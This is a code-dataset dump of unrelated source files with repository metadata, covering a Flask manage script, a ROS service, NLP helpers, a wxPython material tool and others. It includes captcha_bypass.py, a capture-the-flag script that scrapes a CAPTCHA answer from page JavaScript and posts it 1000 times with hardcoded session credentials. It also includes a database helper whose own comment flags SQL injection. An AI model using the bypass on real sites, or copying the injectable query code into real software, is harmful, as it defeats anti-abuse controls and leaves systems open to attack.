        print logInfo + '发送成功'
    else:
        print logInfo + '发送失败'
# Run the given SQL statement against the database and return all rows.
def getDataFromDataBase(execute):
    """Open a MySQL connection, execute *execute* and return fetchall().

    NOTE(review): callers build SQL with %-interpolation of user input —
    vulnerable to SQL injection if the inputs are ever untrusted.
    """
    conn = mysql.connector.connect(host = 'mysql.xxxx.net',user = 'root',
    password = 'xxxx',database = 'xxxx',port = 3306,
    charset = 'utf8')
    cursor = conn.cursor()
    cursor.execute(execute)
    result = cursor.fetchall()
    cursor.close()
    conn.close()
    return result
# Fetch an Easemob access token for the subsequent API calls.
def getIMAccessToken():
    """Request a client-credentials token, store it in ACCESS_TOKEN with a
    'Bearer ' prefix, and persist it to TOKEN_PATH."""
    global ACCESS_TOKEN
    url = BASE_URL+'/token'
    headers = {'Content-Type': 'application/json;charset=utf-8'}
    payload = {
        'grant_type': 'client_credentials',
        'client_id': CLIENT_ID,
        'client_secret': CLIENT_SECRET
    }
    r = requests.post(url,headers = headers,data = json.dumps(payload))
    if r.status_code == 200:
        data = json.loads(r.text)
        # print(data)
        print('获取access_token成功')
        # r.text here is unicode, so the decoded dict must be accessed with a
        # unicode-encoded key.
        ukey = 'access_token'.encode('unicode_escape')
        ACCESS_TOKEN = 'Bearer ' + data[ukey]
        # Write to file; mode 'w' overwrites any existing content.
        fp = open(TOKEN_PATH, 'w')
        fp.write(ACCESS_TOKEN)
        fp.close()
    else:
        print('获取access_token失败')
    pass
# Script entry point.
if __name__ == '__main__':
    main()
| 23.202073 | 151 | 0.684457 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,687 | 0.496857 |
d500b30356c6d10f466377f593728e458801fa4b | 556 | py | Python | manage.py | g90tony/tonys-perspective | c0296d8aabe7f170368341907e6b4015787347cd | [
"MIT"
] | null | null | null | manage.py | g90tony/tonys-perspective | c0296d8aabe7f170368341907e6b4015787347cd | [
"MIT"
] | null | null | null | manage.py | g90tony/tonys-perspective | c0296d8aabe7f170368341907e6b4015787347cd | [
"MIT"
] | null | null | null | from flask_script import Manager, Server
from flask_migrate import Migrate, MigrateCommand
from app import create_app, db
from app.models import User, Article, Category, Comment, Quote
# Build the Flask app with the development config and attach the
# Flask-Script manager plus the Flask-Migrate command set to it.
app = create_app('development')
manager = Manager(app)
migrate= Migrate(app, db)
# `python manage.py db ...` -> migrations; `python manage.py server` -> dev server.
manager.add_command('db', MigrateCommand)
manager.add_command('server', Server)
@manager.shell
def make_shell_context():
    """Objects pre-imported into the `python manage.py shell` session."""
    return dict(app = app, db = db, User= User, Article= Article, Category= Category, Comment= Comment, Quote= Quote)
if __name__ == '__main__':
    manager.run()
d5025b15829b19f379302daca23271668cadecc4 | 389 | py | Python | setup.py | alvations/mindset | 05180a4bbf3162d97ffa148b0babc920764c6b1d | [
"MIT"
] | 2 | 2020-11-09T23:13:58.000Z | 2020-11-12T12:13:14.000Z | setup.py | alvations/mindset | 05180a4bbf3162d97ffa148b0babc920764c6b1d | [
"MIT"
] | null | null | null | setup.py | alvations/mindset | 05180a4bbf3162d97ffa148b0babc920764c6b1d | [
"MIT"
] | null | null | null | from distutils.core import setup
import setuptools
# Distribution metadata for the mindset package.
setup(
    name='mindset',
    version='0.0.1',
    description='Mindset',
    author='',
    url='https://github.com/alvations/mindset',
    packages=['mindset'],
    keywords=[],
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
)
| 21.611111 | 47 | 0.624679 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 187 | 0.48072 |
d503452c7afa0f6d1b9b7a4cde6e1cea9bbc9d99 | 2,082 | py | Python | cir_project/cirp_user/scripts/camera_user.py | sprkrd/UPC-MAI-CIR | f9a6ef6e9c95534c1fdea6f9023c939bd89c2df8 | [
"MIT"
] | 1 | 2021-11-18T13:34:48.000Z | 2021-11-18T13:34:48.000Z | cir_project/cirp_user/scripts/camera_user.py | sprkrd/UPC-MAI-CIR | f9a6ef6e9c95534c1fdea6f9023c939bd89c2df8 | [
"MIT"
] | null | null | null | cir_project/cirp_user/scripts/camera_user.py | sprkrd/UPC-MAI-CIR | f9a6ef6e9c95534c1fdea6f9023c939bd89c2df8 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import rospy
from std_msgs.msg import String
from peyetribe import EyeTribe
import time
from cir_user.srv import UserAction, UserActionResponse
# Screen-region thresholds splitting a 1280-px-wide display into
# left / middle / right thirds (used by the commented-out gaze code).
TH1 = 1280*(1.0/3)
TH2 = 1280*(2.0/3)
# Network address of the EyeTribe gaze-tracker server.
IP = "192.168.101.72"
class CameraUserServer:
    """ROS node exposing a ``poll_action`` service that blocks until the
    console operator supplies the next user action."""

    def __init__(self):
        """Register the ROS node and the ``poll_action`` service."""
        rospy.init_node("talker")
        rospy.Service("poll_action", UserAction, self._action_cb)
        self._next_action = None
        # Eye-tracker integration is currently disabled; enabling it would
        # also create self._tracker (see the gaze code in set_next_action).
        # self._tracker = EyeTribe()
        # self._tracker.connect(IP)
        # self._tracker.pullmode()

    def _action_cb(self, req):
        """Service callback: poll at 10 Hz until an action has been queued,
        then consume it and return it to the caller."""
        rate = rospy.Rate(10)
        action = self._next_action
        while action is None:
            rate.sleep()
            action = self._next_action
        self._next_action = None
        return UserActionResponse(action=action)

    def set_next_action(self):
        """Read the next action string from stdin and queue it for the
        pending service call."""
        inp = raw_input("Action: ")
        self._next_action = inp
        # inp = raw_input("Press p or d: ").strip()
        # while inp not in ("p", "d"):
        # inp = raw_input("Unknown action {}. Press p or d: ".format(inp)).strip()
        # data_str = str(self._tracker.next()._avg)
        # x_coord = float(data_str.split(";")[0])
        # rospy.loginfo("x_coord=" + str(x_coord))
        # if x_coord < TH1:
        # direction = "L"
        # elif x_coord < TH2:
        # direction = "M"
        # else:
        # direction = "R"
        # if inp == "p": # Pick action
        # rospy.loginfo("Pick Action in coordinate:")
        # action = "pick" + direction
        # elif inp == "d":
        # rospy.loginfo("Drop Action in coordinate:")
        # action = "put" + direction
        # if action == "putM": # Invalid action
        # action = ""
        # self._next_action = action

    def shutdown(self):
        """Release the eye tracker, if one was ever initialised.

        Bug fix: ``self._tracker`` is only created by the commented-out
        setup in ``__init__``, so the previous unconditional
        ``self._tracker.close()`` raised AttributeError on every shutdown.
        """
        tracker = getattr(self, '_tracker', None)
        if tracker is not None:
            tracker.close()
if __name__ == '__main__':
try:
user = CameraUserServer()
while True:
user.set_next_action()
except rospy.ROSInterruptException:
pass
finally:
print "Shutting down server..."
user.shutdown()
| 28.135135 | 86 | 0.56292 | 1,592 | 0.764649 | 0 | 0 | 0 | 0 | 0 | 0 | 830 | 0.398655 |
d50550ea66d6bcca0e8c6d873de65a99c1e874cd | 833 | py | Python | captcha_bypass.py | ruroot/captcha_bypass | 6457d7bb6152ddd8d784bac8cd99488f2534013e | [
"MIT"
] | null | null | null | captcha_bypass.py | ruroot/captcha_bypass | 6457d7bb6152ddd8d784bac8cd99488f2534013e | [
"MIT"
] | null | null | null | captcha_bypass.py | ruroot/captcha_bypass | 6457d7bb6152ddd8d784bac8cd99488f2534013e | [
"MIT"
] | null | null | null | import requests
# Session state and endpoints for the RingZer0 CAPTCHA challenge.
cookie = {'_ga':'GA1.2.1373385590.1498799275','_gid':'GA1.2.867459789.1498799275','_gat':'1','PHPSESSID':'1kr76vh1164sbgeflnngimi321'}
url = 'http://captcha.ringzer0team.com:7421'
headers = {'Authorization':'Basic Y2FwdGNoYTpRSmM5VTZ3eEQ0U0ZUMHU='}

# The expected answer is embedded in a client-side JS check of the form
# `if (A == "<answer>")` on the challenge page.
marker = 'if (A == "'
for attempt in range(1000):
    # Fetch the challenge page and extract the answer string.
    page = requests.get("http://captcha.ringzer0team.com:7421/form1.php",cookies=cookie,headers=headers)
    begin = page.text.find(marker) + len(marker)
    end = page.text.find('"', begin)
    captcha = page.text[begin:end]
    print(attempt, ":", captcha)
    # Request a fresh (broken) captcha image, then submit the extracted answer.
    requests.get("http://captcha.ringzer0team.com:7421/captcha/captchabroken.php?new",cookies=cookie,headers=headers)
    data = {'captcha': captcha}
    requests.post('http://captcha.ringzer0team.com:7421/captcha1.php',cookies=cookie,headers=headers,data=data)
| 55.533333 | 134 | 0.727491 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 429 | 0.515006 |
d505765173ba8ae48d059a5d6519553fdbd987f4 | 685 | py | Python | antlr-python/ChatErrorListener.py | evilkirin/antlr-mega-tutorial | 91135a7b2fc9e99b9fc500b290a4a2893d328bf8 | [
"MIT"
] | 138 | 2017-03-08T14:29:54.000Z | 2020-04-25T23:00:26.000Z | antlr-python/ChatErrorListener.py | evilkirin/antlr-mega-tutorial | 91135a7b2fc9e99b9fc500b290a4a2893d328bf8 | [
"MIT"
] | 17 | 2020-05-08T10:10:39.000Z | 2022-01-21T20:40:16.000Z | lifestyle/antlr-mega-tutorial-master/antlr-python/ChatErrorListener.py | pennz/antlr_lifestyle | e97f0a2e125fc851b637ef854e5d4968491acb42 | [
"BSD-3-Clause"
] | 38 | 2017-03-15T02:44:17.000Z | 2020-03-30T10:24:15.000Z | import sys
from antlr4 import *
from ChatParser import ChatParser
from ChatListener import ChatListener
from antlr4.error.ErrorListener import *
import io
class ChatErrorListener(ErrorListener):
def __init__(self, output):
self.output = output
self._symbol = ''
def syntaxError(self, recognizer, offendingSymbol, line, column, msg, e):
self.output.write(msg)
if offendingSymbol is not None:
self._symbol = offendingSymbol.text
else:
self._symbol = recognizer.getTokenErrorDisplay(offendingSymbol);
@property
def symbol(self):
return self._symbol | 29.782609 | 85 | 0.646715 | 529 | 0.772263 | 0 | 0 | 67 | 0.09781 | 0 | 0 | 2 | 0.00292 |
d50622fc11746b41527aa6f48d3bb22b36bbce6d | 568 | py | Python | home/urls.py | auxfuse/ci-hackathon-app | 87d5ad7aae33c15f535ceed28e1657a014159516 | [
"MIT"
] | 11 | 2020-10-06T13:50:46.000Z | 2021-02-27T20:19:17.000Z | home/urls.py | auxfuse/ci-hackathon-app | 87d5ad7aae33c15f535ceed28e1657a014159516 | [
"MIT"
] | 174 | 2020-10-13T18:25:34.000Z | 2022-01-17T09:49:18.000Z | home/urls.py | auxfuse/ci-hackathon-app | 87d5ad7aae33c15f535ceed28e1657a014159516 | [
"MIT"
] | 46 | 2020-10-14T11:27:20.000Z | 2022-01-31T17:48:12.000Z | from django.urls import path
from . import views
urlpatterns = [
path("", views.home, name="home"),
path("faq/", views.faq, name="faq"),
path("plagiarism_policy/", views.plagiarism_policy,
name="plagiarism_policy"),
path("privacy_policy/", views.privacy_policy, name="privacy_policy"),
path("post_login/", views.index, name="post_login"),
path("save_partnership_contact_form/", views.save_partnership_contact_form,
name="save_partnership_contact_form"),
path("500/", views.test_500),
path("404/", views.test_404),
]
| 33.411765 | 79 | 0.68662 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 191 | 0.336268 |
d5068f56351c172f868906780ca7bfa27fd8680d | 13,750 | py | Python | ogreyMaterialTool.py | opengd/OgreyTool | 42e169fe530458084c20d6fb3e7a2dc78f1ac487 | [
"MIT"
] | null | null | null | ogreyMaterialTool.py | opengd/OgreyTool | 42e169fe530458084c20d6fb3e7a2dc78f1ac487 | [
"MIT"
] | null | null | null | ogreyMaterialTool.py | opengd/OgreyTool | 42e169fe530458084c20d6fb3e7a2dc78f1ac487 | [
"MIT"
] | null | null | null | import wx
from ogreyPopupMenu import *
from ogreyOgreManagers import *
from ogreyTool import *
class Singleton(type):
    """Metaclass caching one instance per distinct positional-argument tuple.

    Calling the class twice with equal arguments returns the same object;
    different argument tuples yield (and cache) different instances.
    """
    def __init__(cls, *args):
        type.__init__(cls, *args)
        # Per-class cache mapping argument tuples to the constructed instance.
        cls._instances = {}
    def __call__(cls, *args):
        try:
            return cls._instances[args]
        except KeyError:
            instance = type.__call__(cls, *args)
            cls._instances[args] = instance
            return instance
# Smoke test for the Singleton metaclass.
# NOTE(review): this uses Python 2 `__metaclass__` syntax; under Python 3 the
# attribute is ignored and these asserts would fail (py3 spelling is
# `class Test(metaclass=Singleton)`).
class Test:
    __metaclass__=Singleton
    def __init__(self, *args): pass
# Same argument tuple -> same cached instance; different args -> new instance.
ta1, ta2 = Test(), Test()
assert ta1 is ta2
tb1, tb2 = Test(5), Test(5)
assert tb1 is tb2
assert ta1 is not tb1
class LogList(wx.TextCtrl):
    """Multiline text control used as a simple log pane."""
    def __init__(self, parent):
        wx.TextCtrl.__init__(self, parent, -1, "", style=wx.TE_MULTILINE)
class ogreyMaterialTool(wx.MiniFrame):
    """Floating tool window for browsing and previewing Ogre materials.

    Builds a four-pane layout: resource tree and material tree on the left,
    attribute notebook and Ogre render preview on the right.
    """
    def __init__(self, parent, config, ogreMgr):
        # NOTE(review): the ogreMgr parameter is ignored; the shared
        # OgreManager singleton is used instead -- confirm intent.
        wx.MiniFrame.__init__(self, parent, -1, "Material Tool", size = (500, 500))
        self.parent = parent
        self.config = config
        #self.ogreManager = OgreManager()
        self.ogreMgr = OgreManager().ogreMgr
        self.Show(True)
        self.define()
        # Intercept close so the window is only hidden, not destroyed.
        wx.EVT_CLOSE(self, self.OnClose)
    def OnClose(self, event):
        # Hide instead of destroy, so the tool can be reopened later.
        self.Show(False)
    def define(self):
        """Build the widget hierarchy: splitters first, then their contents."""
        self.defineSplitters()
        self.defineTrees()
    def definePopupMenu(self):
        # Not implemented yet. A large block of commented-out popup-menu
        # scaffolding (add material/technique/pass/texture-unit items and
        # the related event bindings) was removed here; see version control
        # history if it needs to be revived.
        pass
    def defineSplitters(self):
        """Create the main vertical splitter and its two nested splitters."""
        self.halfsplitter = wx.SplitterWindow(self)
        self.halfsplitter.SetSashGravity(0.5)
        self.halfsplitter.SetSize(self.GetSize())
        self.leftsplitter = wx.SplitterWindow(self.halfsplitter)
        self.rightsplitter = wx.SplitterWindow(self.halfsplitter)
        self.halfsplitter.SplitVertically(self.leftsplitter, self.rightsplitter, 0.5)
    def defineTrees(self):
        """Fill the splitters: attribute notebook + Ogre preview on the right,
        resource tree + material tree on the left."""
        self.materialAttributes = MaterialAttributes(self.rightsplitter)
        self.materialPreview = wx.Notebook(self.rightsplitter, -1)
        self.ogreScene = OgreScene(self.ogreMgr, self.materialPreview, NameFactory())
        self.ogreView = self.ogreScene.create()
        self.materialPreview.AddPage(self.ogreView, "Preview")
        self.rightsplitter.SplitHorizontally(self.materialAttributes, self.materialPreview, 0.5)
        self.resourceTree = MaterialResourceTree(self.leftsplitter, self.config)
        self.materialTree = MaterialTree(self.leftsplitter)
        self.leftsplitter.SplitVertically(self.resourceTree, self.materialTree, 0.5)
    def defineWindows(self):
        # Placeholder; no extra windows are created yet.
        pass
class MaterialSplitter(wx.SplitterWindow):
    """Splitter window pre-configured to fill its parent and resize evenly."""
    def __init__(self, parent):
        wx.SplitterWindow.__init__(self, parent)
        self.SetSashGravity(0.5)  # both panes grow equally on resize
        self.SetSize(parent.GetSize())
class MaterialResourceTree(wx.TreeCtrl):
    """Tree listing material resources from the config plus loaded materials.

    Populates a flat tree under a "Material Resource" root with every
    configured material resource and every material reported by
    ResourceInformation().
    """
    def __init__(self, parent, config):
        wx.TreeCtrl.__init__(self, parent, -1)
        self.config = config
        self.Show(True)
        self.AddRoot("Material Resource")
        for c in self.config.Resources["Materials"]["resources"]:
            self.AppendItem(self.GetRootItem(), c)
        for c in ResourceInformation().loadedMaterials:
            # Debug trace of each loaded material. Fixed: the original used
            # the Python 2-only statement form `print c`; `print(c)` behaves
            # identically on Python 2 and 3 for a single argument.
            print(c)
            self.AppendItem(self.GetRootItem(), c)
class MaterialTree(wx.TreeCtrl):
    """Tree for the structure of the edited material (not populated here)."""
    def __init__(self, parent):
        wx.TreeCtrl.__init__(self, parent, -1)
        self.Show(True)
class MaterialAttributes(wx.Notebook):
    """Notebook with two placeholder log panes ("Log1"/"Log2")."""
    def __init__(self, parent):
        wx.Notebook.__init__(self, parent, -1)
        # Create both panes first, then add them as pages, then seed their
        # placeholder text -- mirroring the original call order exactly.
        panes = [LogList(self) for _ in range(2)]
        for pane, title in zip(panes, ("Log1", "Log2")):
            self.AddPage(pane, title)
        for pane, placeholder in zip(panes, ("moaster", "satans")):
            pane.AppendText(placeholder)
class MaterialPreviewAttributes(wx.Window):
    """Placeholder window for preview attributes.

    NOTE(review): the ogreMgr argument is accepted but never stored or used
    -- confirm whether it is still needed.
    """
    def __init__(self, parent, ogreMgr):
        wx.Window.__init__(self, parent)
class MaterialPreviewView(wx.Window):
    """Window intended to host the Ogre-rendered material preview."""
    def __init__(self, parent, ogreMgr):
        # NOTE(review): the ogreMgr parameter is ignored; the shared
        # OgreManager singleton is used instead -- confirm intent.
        wx.Window.__init__(self, parent)
        self.parent = parent
        self.ogreMgr = OgreManager().ogreMgr
        self.nameFactory = NameFactory()
class Attributes:
    """Renders attribute-row descriptions into a fold panel.

    NOTE(review): declared with Python 2 `__metaclass__` syntax; under
    Python 3 that attribute is ignored and the class is NOT a singleton.
    Also relies on self.foldPanel, self.FoldPanelWindow and
    self.GetSizeTuple, which are not defined here -- presumably supplied by
    a host/mixin class; confirm.
    """
    __metaclass__=Singleton
    def __init__(self):
        pass
    def showObjectAttributes(self, Attributes, name):
        """Create a fold panel titled *name* and fill it with widget rows.

        *Attributes* is a list of rows; each row is a list of cell dicts
        whose "type" key selects the widget to build (text, bitmapbutton,
        combobox, button, checkbox, slider, panel, textctrl, comment, empty).
        Cells are positioned on a fixed grid: three x columns, 22px rows.
        """
        column = (5, 105, 205)  # x offsets of the up-to-three cell columns
        row = 22                # row height in pixels
        pan = self.foldPanel.AddFoldPanel(name, False)
        r = 0
        tulo = wx.Panel(pan, -1, style = wx.FULL_REPAINT_ON_RESIZE)
        for attrib in Attributes:
            c = 0
            for rowItem in attrib:
                if rowItem["type"] == "text":
                    obj = wx.TextCtrl(tulo, -1,"", style=rowItem["style"], pos = (column[c], row*r))
                    if not rowItem["attribs"] == None: obj.SetDefaultStyle(rowItem["attribs"])
                    obj.WriteText(rowItem["value"])
                    obj.SetEditable(rowItem["editable"])
                    if not rowItem["event"] == None:
                        obj.Bind(wx.EVT_TEXT, rowItem["event"])
                elif rowItem["type"] == "bitmapbutton":
                    modelButton = wx.BitmapButton(tulo, -1,rowItem["image"], pos = (column[c], row*r))
                    modelButton.Bind(wx.EVT_BUTTON, rowItem["event"])
                elif rowItem["type"] == "combobox":
                    # Combo boxes stretch across the panel width minus a margin.
                    comboBox = wx.ComboBox(tulo, -1, pos=(column[c], row*r), choices=rowItem["value"], style=rowItem["style"], size = (self.GetSizeTuple()[0] -8, -1))
                    comboBox.Bind(wx.EVT_COMBOBOX, rowItem["event"])
                elif rowItem["type"] == "button":
                    modelButton = wx.Button(tulo, -1,rowItem["value"], pos = (column[c], row*r))
                    modelButton.Bind(wx.EVT_BUTTON, rowItem["event"])
                elif rowItem["type"] == "checkbox":
                    checkbox = wx.CheckBox(tulo, -1, rowItem["value"], pos = (column[c]+5, row*r))
                    checkbox.Bind(wx.EVT_CHECKBOX, rowItem["event"])
                    checkbox.SetValue(rowItem["state"])
                elif rowItem["type"] == "slider":
                    slider = wx.Slider(tulo, -1, value = rowItem["value"],
                        minValue = rowItem["minValue"], maxValue = rowItem["maxValue"],
                        style = rowItem["style"], pos = (column[c], row*r))
                    slider.Bind(wx.EVT_SLIDER, rowItem["event"])
                elif rowItem["type"] == "panel":
                    panel = wx.Panel(tulo, -1, pos = (column[c], row*r), size = rowItem["size"], style= rowItem["style"])
                    panel.SetBackgroundColour(rowItem["bgcolor"])
                    panel.Refresh(True, None)
                elif rowItem["type"] == "textctrl":
                    # NOTE(review): stored on self.text, so only the most
                    # recently built textctrl is reachable afterwards.
                    self.text = wx.TextCtrl(tulo, -1, rowItem["value"], pos=(column[c], row*r), size = (self.GetSizeTuple()[0] -8,rowItem["height"]),style = rowItem["style"])
                    self.text.Bind(wx.EVT_TEXT, rowItem["event"])
                elif rowItem["type"] == "comment":
                    text = wx.StaticText(tulo, -1,label = rowItem["label"],pos = (column[c], row*r))
                elif rowItem["type"] == "empty":
                    pass
                c += 1
            r += 1
        tulo.Fit()
        self.FoldPanelWindow(pan, tulo)
class MaterialOptions:
    """Editable attribute rows for a material object (currently name only)."""
    def __init__(self, mmaterial):
        self.object = mmaterial
        # One row: a read-only "Name" label cell plus an editable text cell
        # whose change event writes back through OnName.
        self.Options =[
            [
                {"type" : "text", "editable" : False, "value" : "Name", "style" : wx.TE_LEFT | wx.TE_RICH2, "return" : None, "event" : None, "attribs" : wx.TextAttr(alignment = wx.TEXT_ALIGNMENT_RIGHT)},
                {"type" : "text", "editable" : True, "value" : self.object.name, "style" : wx.TE_RIGHT, "event" : self.OnName, "attribs" : None},
            ]
        ]
    def OnName(self, event):
        # Push the edited text back onto the wrapped material object.
        self.object.name = event.GetClientObject().GetValue()
class TechniqueOptions:
    """Attribute rows for a material technique (no editable options yet)."""
    def __init__(self, mtechnique):
        self.mtechnique = mtechnique
        self.Options = []
class PassOptions:
    """Attribute rows for a material pass (no editable options yet)."""
    def __init__(self, mpass):
        self.mpass = mpass
        self.Options = []
class TextureUnitOptions:
    """Attribute rows for a texture unit (no editable options yet)."""
    def __init__(self, mtextureUnit):
        self.mtextureUnit = mtextureUnit
        self.Options = []
class VertexProgramRefOptions:
    """Editable attribute rows for a vertex-program reference (name only).

    NOTE(review): structurally identical to FragmentProgramRefOptions,
    VertexProgramOptions and FragmentProgramOptions -- a shared base class
    would remove the duplication.
    """
    def __init__(self, mvertexProgramRef):
        self.object = mvertexProgramRef
        # One row: read-only "Name" label plus an editable text cell bound to OnName.
        self.Options =[
            [
                {"type" : "text", "editable" : False, "value" : "Name", "style" : wx.TE_LEFT | wx.TE_RICH2, "return" : None, "event" : None, "attribs" : wx.TextAttr(alignment = wx.TEXT_ALIGNMENT_RIGHT)},
                {"type" : "text", "editable" : True, "value" : self.object.name, "style" : wx.TE_RIGHT, "event" : self.OnName, "attribs" : None},
            ]
        ]
    def OnName(self, event):
        # Write the edited text back to the wrapped object's name.
        self.object.name = event.GetClientObject().GetValue()
class FragmentProgramRefOptions:
    """Editable attribute rows for a fragment-program reference (name only)."""
    def __init__(self, mfragmentProgramRef):
        self.object = mfragmentProgramRef
        # One row: read-only "Name" label plus an editable text cell bound to OnName.
        self.Options =[
            [
                {"type" : "text", "editable" : False, "value" : "Name", "style" : wx.TE_LEFT | wx.TE_RICH2, "return" : None, "event" : None, "attribs" : wx.TextAttr(alignment = wx.TEXT_ALIGNMENT_RIGHT)},
                {"type" : "text", "editable" : True, "value" : self.object.name, "style" : wx.TE_RIGHT, "event" : self.OnName, "attribs" : None},
            ]
        ]
    def OnName(self, event):
        # Write the edited text back to the wrapped object's name.
        self.object.name = event.GetClientObject().GetValue()
class VertexProgramOptions:
    """Editable attribute rows for a vertex program (name only)."""
    def __init__(self, mvertexProgram):
        self.object = mvertexProgram
        # One row: read-only "Name" label plus an editable text cell bound to OnName.
        self.Options =[
            [
                {"type" : "text", "editable" : False, "value" : "Name", "style" : wx.TE_LEFT | wx.TE_RICH2, "return" : None, "event" : None, "attribs" : wx.TextAttr(alignment = wx.TEXT_ALIGNMENT_RIGHT)},
                {"type" : "text", "editable" : True, "value" : self.object.name, "style" : wx.TE_RIGHT, "event" : self.OnName, "attribs" : None},
            ]
        ]
    def OnName(self, event):
        # Write the edited text back to the wrapped object's name.
        self.object.name = event.GetClientObject().GetValue()
class FragmentProgramOptions:
    """Editable attribute rows for a fragment program (name only)."""
    def __init__(self, mfragmentProgram):
        self.object = mfragmentProgram
        # One row: read-only "Name" label plus an editable text cell bound to OnName.
        self.Options =[
            [
                {"type" : "text", "editable" : False, "value" : "Name", "style" : wx.TE_LEFT | wx.TE_RICH2, "return" : None, "event" : None, "attribs" : wx.TextAttr(alignment = wx.TEXT_ALIGNMENT_RIGHT)},
                {"type" : "text", "editable" : True, "value" : self.object.name, "style" : wx.TE_RIGHT, "event" : self.OnName, "attribs" : None},
            ]
        ]
    def OnName(self, event):
        # Write the edited text back to the wrapped object's name.
        self.object.name = event.GetClientObject().GetValue()
| 43.650794 | 203 | 0.583782 | 13,445 | 0.977818 | 0 | 0 | 0 | 0 | 0 | 0 | 4,040 | 0.293818 |
d506de8e02af069210ffd80855347f0a1726c56d | 2,366 | py | Python | utils/nlp.py | dominikmn/one-million-posts | a628e88874ca7134a7628d88de169e8520f8deba | [
"MIT"
] | null | null | null | utils/nlp.py | dominikmn/one-million-posts | a628e88874ca7134a7628d88de169e8520f8deba | [
"MIT"
] | 95 | 2021-03-26T14:37:37.000Z | 2021-09-07T08:26:03.000Z | utils/nlp.py | dominikmn/one-million-posts | a628e88874ca7134a7628d88de169e8520f8deba | [
"MIT"
] | 2 | 2021-04-19T15:43:57.000Z | 2021-04-19T15:57:47.000Z | import nltk
nltk.download('stopwords')
from nltk.corpus import stopwords
stopwords=stopwords.words('german')
nltk.download('punkt')
from nltk.stem.snowball import SnowballStemmer
import spacy
from spacy_iwnlp import spaCyIWNLP
nlp=spacy.load('de') #You need to download the 'de'-module in advance. This will be done automatically if you run `make setup` via the Makefile found in the main folder of the repo.
from pathlib import Path
path_here = Path(__file__).resolve().parent
iwnlp=spaCyIWNLP(lemmatizer_path= path_here / "../data/IWNLP.Lemmatizer_20181001.json")
nlp.add_pipe(iwnlp)
stemmer = SnowballStemmer('german')
from utils import cleaning
def strip_stopwords(series, stopwords=stopwords):
    '''Remove stopwords from a series of strings (kept words are lowercased).

    Arguments: series - a pandas Series of strings (entries may be None),
               stopwords - iterable of lowercase stopwords (default: german)
    Return: a new Series with stopwords removed; None entries pass through unchanged.'''
    # Build a set once so membership tests are O(1); the original scanned a
    # list for every word. Also dropped a dead `series.copy()` -- apply()
    # never mutated the input.
    stopword_set = set(stopwords)
    new_series = series.apply(
        lambda x: " ".join(
            word.lower() for word in x.split() if word.lower() not in stopword_set
        ) if x is not None else x
    )
    return new_series
def stem_germ(x):
    '''Stem a german text.
    Arguments: x - a string containing german text
    Return: the stemmed text, stems joined by single spaces'''
    tokens = nltk.word_tokenize(cleaning.normalize(x))
    return " ".join(stemmer.stem(token) for token in tokens)
def lem_germ(x):
    '''Lemmatize a german text via spaCy + IWNLP.

    Falls back to a token's surface form when IWNLP knows no lemma.
    Arguments: x - a string containing german text
    Return: the lemmatized text. NOTE: every token is prefixed with a space,
            so the result carries a leading space (preserved from the
            original implementation -- downstream whitespace tokenization
            is unaffected).'''
    doc = nlp(cleaning.normalize(x))
    lemmed = ""
    for token in doc:
        lemmas = token._.iwnlp_lemmas
        # Replaces the original bare `except:` which silently caught the
        # TypeError/IndexError raised when iwnlp_lemmas is None or empty
        # (and would also have hidden unrelated bugs).
        if lemmas:
            lemmed += " " + lemmas[0]
        else:
            lemmed += " " + str(token)
    return lemmed
def lem_stem(series, lem_stem):
    '''Stem and/or lemmatize a series of german texts.

    Arguments: series - a pandas Series containing german texts.
               lem_stem - "stem" to stem, "lem" to lemmatize, or
                          "lem_stem" to lemmatize then stem
    Return: the transformed Series.
    Raises: ValueError for an unknown lem_stem option (the original code
            crashed with an obscure NameError because new_series was
            never bound).'''
    if lem_stem == 'stem':
        return series.apply(stem_germ)
    if lem_stem == 'lem':
        return series.apply(lem_germ)
    if lem_stem == 'lem_stem':
        return series.apply(lem_germ).apply(stem_germ)
    raise ValueError("unknown lem_stem option: {!r}".format(lem_stem))
| 38.16129 | 181 | 0.695689 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,047 | 0.442519 |
d5079b7e4434645da0fb5e3ffaa6425629f4d22f | 2,960 | py | Python | heat/engine/resources/__init__.py | pshchelo/heat | 6cf94a3ece89d77b839f61292e5f023c3f192c82 | [
"Apache-2.0"
] | null | null | null | heat/engine/resources/__init__.py | pshchelo/heat | 6cf94a3ece89d77b839f61292e5f023c3f192c82 | [
"Apache-2.0"
] | null | null | null | heat/engine/resources/__init__.py | pshchelo/heat | 6cf94a3ece89d77b839f61292e5f023c3f192c82 | [
"Apache-2.0"
] | null | null | null | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from stevedore import extension
from heat.engine import clients
from heat.engine import environment
from heat.engine import plugin_manager
def _register_resources(env, type_pairs):
for res_name, res_class in type_pairs:
env.register_class(res_name, res_class)
def _register_constraints(env, type_pairs):
for constraint_name, constraint in type_pairs:
env.register_constraint(constraint_name, constraint)
def _register_stack_lifecycle_plugins(env, type_pairs):
for stack_lifecycle_name, stack_lifecycle_class in type_pairs:
env.register_stack_lifecycle_plugin(stack_lifecycle_name,
stack_lifecycle_class)
def _get_mapping(namespace):
    """Return [name, plugin class] pairs for every stevedore extension
    registered under *namespace* (plugins are not instantiated)."""
    mgr = extension.ExtensionManager(
        namespace=namespace,
        invoke_on_load=False)
    return [[name, mgr[name].plugin] for name in mgr.names()]
_environment = None
def global_env():
    """Return the process-wide resource environment, initialising it lazily
    on first access."""
    if _environment is None:
        initialise()
    return _environment
def initialise():
    """Initialise the process-wide resource environment exactly once.

    Subsequent calls are no-ops. Sets the module-level _environment after
    clients are initialised and all global resources are loaded.
    """
    global _environment
    if _environment is not None:
        return
    clients.initialise()
    # Renamed the local from 'global_env' to 'env': the original shadowed
    # the module-level global_env() function inside this scope.
    env = environment.Environment({}, user_env=False)
    _load_global_environment(env)
    _environment = env
def _load_global_environment(env):
